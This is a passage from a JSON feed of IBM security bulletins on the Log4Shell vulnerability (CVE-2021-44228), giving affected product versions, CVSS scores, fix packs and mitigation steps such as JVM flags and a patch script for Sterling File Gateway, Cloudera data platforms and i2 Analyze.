Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Product\":{\"code\":\"SSEUEX\",\"label\":\"Content Navigator\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"3.0 Continuous Delivery\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB18\",\"label\":\"Miscellaneous LOB\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T18:34:30", "type": "ibm", "title": "Security Bulletin: IBM Content Navigator container deployments are vulnerable to a remote execution vulnerability (Log4j)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": 
"2021-12-17T18:34:30", "id": "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "href": "https://www.ibm.com/support/pages/node/6527946", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:43:19", "description": "## Summary\n\nIBM Sterling File Gateway is impacted by Log4Shell (CVE-2021-44228), through the use of Apache Log4j's JNDI logging feature. Final remediation images published below. As an alternative to the final remediation images, manual mitigation steps are also provided below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling File Gateway| 6.0.0.0 - 6.1.1.0 \n \nNote that remote perimeter server, CLA2, OpsServer and external purge has been assessed for impact and were found to be not affected.\n\nDue to concern surrounding Apache Log4j CVE-2021-44228 end-of-support stream IBM Sterling B2B Integrator Version 5.2.x has been assessed for impact the versions and fix packs below were found to be not affected by CVE-2021-44228: \n5020605_3 and all lower fix packs \n5020604 and all fix packs \n5020603 and all fix packs \n5020602 and all fix packs \n5020601 and all fix packs \n5020600 and all fix packs \n5020500 and all fix packs \n5020402 and all fix packs\n\n## Remediation/Fixes\n\nProduct & Version| Remediation & Fix \n---|--- \n6.0.0.0 - 6.1.1.0| \n\n**_IIM_**\n\nStep 1: Apply IBM Sterling Filegateway IIM version 6.0.0.7, 6.0.3.5, 6.1.0.4, 6.1.1.0, 6.0.2.3 or 6.0.1.2 \n\nStep 2: Apply the remediating ifix 6.0.0.7_1, 6.0.3.5_1, 6.1.0.4_1 , 6.1.1.0_1, 6.0.2.3._1 or 6.0.1.2_1 that are located on [Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=6.0.3.3-OtherSoftware-SFG-Docker-All&product=ibm%2FOther%20software%2FSterling%20File%20Gateway&release=All&platform=All&function=all>)\n\nAlso for 6.1.1.0 after applying the remediating ifix 6.1.1.0_1, additionally follow the steps in this [technote.](<https://www.ibm.com/support/pages/node/6551444> \"technote\" )\n\n**_Docker & Containers_**\n\nStep 1: Apply either IBM Sterling Filegateway Docker version 6.0.0.7, 6.0.3.5 or 6.1.0.4, \n\nStep 2: Next apply one of the remediating ifixes below:\n\nIBM Sterling Filegateway Docker version 6.0.0.7_1 on [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+B2B+Integrator&fixids=6.0.0.7-OtherSoftware-B2Bi-Docker-All-IF0001&source=SAR>)\n\nIBM Sterling Filegateway Docker version 
6.0.3.5_1 on [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+File+Gateway&fixids=6.0.3.5-OtherSoftware-SFG-Docker-All-IF0001&source=SAR>)\n\nIBM Sterling Filegateway Container version 6.1.0.4_1\n\n * [Certified Container Image](<cp.icr.io/cp/ibm-sfg/sfg:6.1.0.4_1> \"Certified Container Image\" )\n * [Helm Chart](<https://github.com/IBM/charts/blob/master/repo/ibm-helm/ibm-sfg-prod-2.0.5.tgz> \"Helm Chart\" ) \n \n## Workarounds and Mitigations\n\n**If you are unable to apply the remediated fix packs above, as an alternative IBM Sterling File Gateway administrators should apply one of the following remediation steps below cased on deployment pattern.**\n\nThe following instruction applies to B2Bi ASI node and Adapter Container node\n\n 1. Use dashboard UI to navigate to Operations -> System -> Performance -> Tuning -> Edit Performance Configuration\n 2. Add -Dlog4j2.formatMsgNoLookups=true to JVM Argument Suffix box in the page for Performance Tuning: JVM Parameters for Sever\n 3. If there is any adapter container node, do the same change to the page for Performance Tuning: JVM Parameters Container \n 4. Stop B2Bi\n 5. Run setupfiles.sh or setupfiles.cmd \n 6. Restart B2Bi\n\nThe following instruction applies to the Liberty server for B2Bi REST API\n\n 1. Edit <install_dir>\\liberty\\wlp\\usr\\servers\\SIServer\\jvm.options file and find the line that says -Dlog4j2.disable.jmx=true and open up a new line below that and add the following on a new line by itself: -Dlog4j2.formatMsgNoLookups=true \nExample: \n-Dlog4j2.disable.jmx=true \n-Dlog4j2.formatMsgNoLookups=true\n 2. Stop B2Bi\n 3. Restart B2Bi\n\nThe following instruction applies to B2Bi with Docker Container \n\n 1. Use dashboard UI to navigate to Operations -> System -> Performance -> Tuning -> Edit Performance Configuration \n 2. 
Add -Dlog4j2.formatMsgNoLookups=true to JVM Argument Suffix box in the page for Performance Tuning: JVM Parameters for Server \n 3. Liberty: update the setup.cfg LIBERTY_JVM_OPTIONS as LIBERTY_JVM_OPTIONS= -Dlog4j2.formatMsgNoLookups=true \n 4. Run docker run with run_all option for the new setup.cfg \n\nThe following instruction applies to B2Bi with OCP\n\n 1. Update values.yaml for B2Bi. Update the jvm option for the entries below in ibm-b2bi-case-bundle\\charts\\ibm-b2bi-prod\\values.yaml \n\n * libertyJvmOptions: -Dlog4j2.formatMsgNoLookups=true \n * asi: jvmOptions: -Dlog4j2.formatMsgNoLookups=true \n * ac: jvmOptions: -Dlog4j2.formatMsgNoLookups=true \n * api: jvmOptions: -Dlog4j2.formatMsgNoLookups=true \n * Update dataSetup: enabled: false \n * After saving values.yaml, run helm upgrade <helm_version>-f values.yaml . --recreate-pods\n * Same steps need to be followed for ibm-sfg-case-bundle\\charts\\ibm-sfg-prod\\values.yaml for SFG.\n 2. Restart B2Bi\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n12 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSMJDR\",\"label\":\"IBM Sterling File Gateway\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"6.0.0.0 - 6.1.1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T17:28:27", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Sterling File Gateway (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-18T17:28:27", "id": "8F6A844E65558AF61A350206417B63BD70D5B529641691C495C07407B13441B7", "href": "https://www.ibm.com/support/pages/node/6526204", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:41", "description": "## Summary\n\nIBM products for Cloudera Data Platform and Hortonworks Data Platform are affected by critical Apache Log4j vulnerability (CVE-2021-44228). A malicious user could exploit this vulnerability to run arbitrary code as the user or service account running the affected software. The fix includes Apache Log4j v2.16.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM Product(s)**| **Version(s)** \n---|--- \nHortonworks Data Platform (HDP) with IBM| 3.0, 3.0.1 \n \nCloudera Data Platform (CDP) with IBM\n\n * Includes Cloudera Data Hub (CDH) and Cloudera Manager (CM)\n| 7.0 - 7.1.7 \n \n## Remediation/Fixes\n\n**Customers are encouraged to act swiftly to resolve this issue.**\n\n**Apply hotfix**\n\nDownload all files from this repo: <https://github.com/cloudera/cloudera-scripts-for-log4j>\n\n## Steps\n\nRun the following script on all affected cluster nodes.\n\n**NOTE**: After applying the Short Term Resolution, if you add a node, you will need to re-apply the Short Term Resolution again on the new nodes.\n\n**Script: run_log4j_patcher.sh [cdp|cdh|hdp]**\n\n**Function:** The run_log4j_patcher.sh script scans a directory for jar files and removes JndiLookup.class from the ones it finds. Do not run any other script in the downloaded directory--they will be called by run_log4j_patcher.sh automatically.\n\n 1. Stop all running jobs in the production cluster before executing the script\n 2. Navigate to **Cloudera Manager > YARN** > Configuration and ensure that yarn.nodemanager.delete.debug-delay-sec is set to 0 If the value is not zero, you must restart the YARN service after setting the value to 0\n 3. Navigate to **Cloudera Manager > YARN** > Configuration and search for yarn.nodemanager.local-dirs to get the configured Node Manager Local Directory path\n 4. Remove filecache and usercache folder located inside the folders that are specified in yarn.nodemanager.local-dirs\n 5. Download all files from the GitHub repo and copy to all nodes of your cluster.\n 6. Run the script as root on ALL nodes of your cluster. \na. Script will take 1 mandatory argument (cdh|cdp|hdp) \nb. The script takes 2 optional arguments: a base directory to scan in, and a backup directory. 
The default for both are /opt/cloudera and /opt/cloudera/log4shell-backup, respectively. These defaults work for CM/CDH 6 and CDP 7. A different folder will be updated for HDP.\n 7. Ensure that the last line of the script output indicates \u2018Finished\u2019 to verify that the job has completed successfully. The script will fail if a command exits unsuccessfully.\n 8. Restart Cloudera Manager Server, all clusters, and all running jobs and queries.\n\n**Usage: $PROG (subcommand) [options] **\n\n**Subcommands:**\n\n * help Prints this message\n * cdh Scan a CDH cluster node\n * cdp Scan a CDP cluster node\n * hdp Scan a HDP cluster node\n\n**Options (cdh and cdp subcommands only):**\n\n-t <targetdir> Override target directory (default: distro-specific) \n-b <backupdir> Override backup directory (default: /opt/cloudera/log4shell-backup)\n\n**Environment Variables (cdh and cdp subcommands only):**\n\nThe SKIP_* environment variables should only be used if you are running the script again and want to skip phases that have already completed. \nSKIP_JAR If non-empty, skips scanning and patching .jar files \nSKIP_TGZ If non-empty, skips scanning and patching .tar.gz files\n\nSKIP_HDFS* If non-empty, skips scanning and patching .tar.gz files in HDFS\n\nRUN_SCAN If non-empty, runs a final scan for missed vulnerable files.\n\nThis can take several hours.\n\n**NOTE**: CDH/CDP Parcels: The script removes the affected class from all CDH/CDP parcels already installed under /opt/cloudera. This script needs to be re-run after new parcels are installed or after upgrading to versions of CDH/CDP that do not include the long-term fix.\n\n**Removing affected classes from Oozie Shared Libraries (CDH & CDP)**\n\nThe vulnerability affects client libraries uploaded in HDFS by Cloudera Manager. The script takes care of Tez and MapReduce libraries however Oozie libraries will need to be updated manually. 
The following section only applies to Cloudera Data Hub and Cloudera Data Platform releases.\n\nFollow the instructions below to secure the Oozie shared libraries:\n\n1\\. Execute the run_log4j_patcher.sh on the affected cluster.\n\n2\\. Navigate to Cloudera Manager > Oozie > Actions -> \u201cInstall Oozie ShareLib\u201d to re-upload the Oozie libraries in the HDFS from Cloudera Manager. \nIMPORTANT: Ensure that the Oozie service is running prior to executing the command.\n\n**Removing affected classes from Oozie Shared Libraries (HDP)**\n\nRun these commands to update Oozie share lib:\n \n \n su oozie\n kinit oozie /usr/hdp/current/oozie-server/bin/oozie-setup.sh sharelib\n create -fs hdfs://ns1\n oozie admin -oozie http(s)://<oozie-host/loadbalancer>:11(000|443)/oozie\n -sharelibupdate\n \n\n**For the latest updates from Cloudera**, refer to [Resolution for TSB-545 - Private Cloud](<https://my.cloudera.com/knowledge/Title-Resolution-for-TSB-545---Critical-vulnerability-in?id=332012>).\n\nKnown Limitations: Cloudera Data Hub clusters using packages rather than parcels are not yet supported with this fix.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall 
CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS7VGD\",\"label\":\"Cloudera Enterprise Data Hub\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"All\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-17T14:19:15", "type": "ibm", "title": "Security Bulletin: Cloudera Data Platform is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": 
"2022-01-17T14:19:15", "id": "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "href": "https://www.ibm.com/support/pages/node/6541046", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:46", "description": "## Summary\n\nLog4j is used by i2 Analyze and i2 Connect for general purpose and application error logging. It is also used in Analyst's Notebook Premium when the chart store is deployed. This bulletin provides mitigation for the reported CVE-2021-44228 by providing configuration that addresses Log4j being vulnerable.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Software versions requiring changes to both i2 Analyze application server and Solr**\n\n**Software**| **Version**| **Notes** \n---|---|--- \ni2 Analyze| 4.3.5.0| bundled with EIA 2.4.1.0 \ni2 Analyze| 4.3.4.0| bundled with EIA 2.4.0.0 \ni2 Analyze| 4.3.3.0| bundled with EIA 2.3.4.0 \ni2 Connect| 1.1.1| shipped with i2 Analyze 4.3.5.0 \ni2 Connect| 1.1.0| shipped with i2 Analyze 4.3.4.0 \ni2 Connect| 1.0.3| shipped with i2 Analyze 4.3.3.0 \nAnalyst's Notebook Premium| 9.3.1| Chart store component \nAnalyst's Notebook Premium| 9.3.0| Chart Store component \n \n**Software versions requiring changes to Solr only**\n\n**Software**| **Version**| **Notes** \n---|---|--- \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.2.0 \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.3.0 \ni2 Connect| 1.0.2| shipped with i2 Analyze 4.3.2.0 \n \n \n\n\n## Remediation/Fixes\n\nPlease find your version in the tables below and follow the fix pack links for update and instructions.** \n \nSoftware versions requiring changes to both i2 Analyze application server and Solr**\n\n**Software**| **Version**| **Notes**| **Fix pack links** \n---|---|---|--- \ni2 Analyze| 4.3.5.0| bundled with EIA 2.4.1.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.1.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.1.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0>) \ni2 Analyze| 4.3.4.0| bundled with EIA 2.4.0.0| 
[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Analyze| 4.3.3.0| bundled with EIA 2.3.4.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Connect| 1.1.1| shipped with i2 Analyze 4.3.5.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.1.1.2-SEC-I2CONNECT-WinLinux-FP0001&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.1.1.2-SEC-I2CONNECT-WinLinux-FP0001&includeSupersedes=0>) \ni2 Connect| 1.1.0| shipped with i2 Analyze 4.3.4.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Connect| 1.0.3| shipped with i2 Analyze 4.3.3.0| 
[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.3.3-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.3.3-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0>) \nAnalyst's Notebook Premium| 9.3.1| Chart store component| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.1.2-SEC-I2ANBP-Win-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.1.2-SEC-I2ANBP-Win-FP0002&includeSupersedes=0>) \nAnalyst's Notebook Premium| 9.3.0| Chart Store component| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.0.3-SEC-I2ANBP-Win-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.0.3-SEC-I2ANBP-Win-FP0003&includeSupersedes=0>) \n \n**Software versions requiring changes to Solr only**\n\n**Software**| **Version**| **Notes**| **Fix pack links** \n---|---|---|--- \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.2.0| 
[https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.2.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.2.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0>) \ni2 Connect| 1.0.2| shipped with i2 Analyze 4.3.2.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.2.2-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.2.2-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0>) \n \n## Workarounds and Mitigations\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n13 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSXVMQ\",\"label\":\"i2 Analyst\\u0026apos;s Notebook Premium\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"ALL\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSXVTH\",\"label\":\"i2 Analyze\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"ALL\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-24T08:33:49", "type": "ibm", "title": "Security Bulletin: i2 Analyze, i2 Connect and Analyst's Notebook Premium are affected by the Log4j vulnerability (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
